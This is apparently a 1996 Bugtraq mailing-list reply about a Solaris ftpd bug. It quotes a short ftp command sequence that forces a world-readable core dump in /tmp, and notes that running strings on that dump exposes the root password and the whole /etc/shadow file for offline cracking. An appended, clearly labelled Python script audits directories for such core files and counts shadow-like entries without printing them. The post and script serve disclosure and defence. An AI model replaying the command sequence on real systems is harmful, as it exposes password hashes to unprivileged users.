[3476] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (Rune Braathen)
Wed Oct 16 13:28:09 1996
Date: Wed, 16 Oct 1996 11:10:35 +0200
Reply-To: Rune Braathen <runeb@td.org.uit.no>
From: Rune Braathen <runeb@td.org.uit.no>
X-To: Martin Rex <martin.rex@sap-ag.de>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199610152314.AA21264@sap-ag.de>
On Tue, 15 Oct 1996, Martin Rex wrote:
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
Doing a `strings core` on the corefile produced also reveals the entire
/etc/shadow file on Solaris 2.4 and 2.5. This is extremely bad, because
this gives normal users the ability to merge in the encrypted strings in
the password file, and run crack et al.

The problem is related to users with accounts only; anonymous ftp users
should not be able to issue USER and PASS commands.
--
__________________________________________________________________
runeb / cF - runeb@td.org.uit.no - http://www.td.org.uit.no/~runeb
a new life awaits you, in the off-world colonies.
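
An added example, not part of the original post: a defender-side audit that walks a directory such as /tmp, finds core files, and reports whether each is world readable and how many strings in it have the shape of a shadow entry (counts only, the entries themselves are never printed). The 9-field layout with a 13-character crypt(3) hash, the file-name patterns `core` and `core.*`, and the sample bytes are assumptions made for the example.

```python
import os
import re
import stat
import sys

# Assumed Solaris-style shadow line: 9 colon-separated fields, with a
# 13-character traditional crypt(3) hash in the second field.
SHADOW_RE = re.compile(
    rb"^[A-Za-z_][A-Za-z0-9_.-]{0,31}:[./0-9A-Za-z]{13}:(?:\d*:){6}\d*$")
# Printable ASCII runs of 4+ bytes, as `strings` would extract them.
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Constructed sample bytes (placeholder hashes, not from any real system).
SAMPLE_CORE = (b"\x7fELF\x01\x02\x00root:AbCdEfGhIjKlM:9785::::::\n"
               b"daemon:NP:6445::::::\n"
               b"user1:ZyXwVuTsRqPoN:9780:0:90:7:::\x00ftpd\x00")


def count_shadow_entries(data: bytes) -> int:
    """Count printable runs that have the shape of a shadow entry."""
    return sum(1 for m in PRINTABLE_RE.finditer(data)
               if SHADOW_RE.match(m.group()))


def audit_core_files(directory: str) -> list:
    """Return (path, world_readable, shadow_entry_count) per core file."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in sorted(files):
            if name != "core" and not name.startswith("core."):
                continue
            path = os.path.join(root, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            try:
                with open(path, "rb") as fh:
                    hits = count_shadow_entries(fh.read())
            except OSError:
                hits = -1  # could not be read by the auditing user
            findings.append((path, bool(st.st_mode & stat.S_IROTH), hits))
    return findings


if __name__ == "__main__":
    print("constructed sample:", count_shadow_entries(SAMPLE_CORE))
    target = sys.argv[1] if len(sys.argv) > 1 else "/tmp"
    for path, world, hits in audit_core_files(target):
        flag = "WORLD-READABLE" if world else "restricted"
        print(f"{path}: {flag}, shadow-like entries: {hits}")
```

Any core file reported as world readable with a non-zero count should be removed, and the accounts whose entries it held should get new passwords.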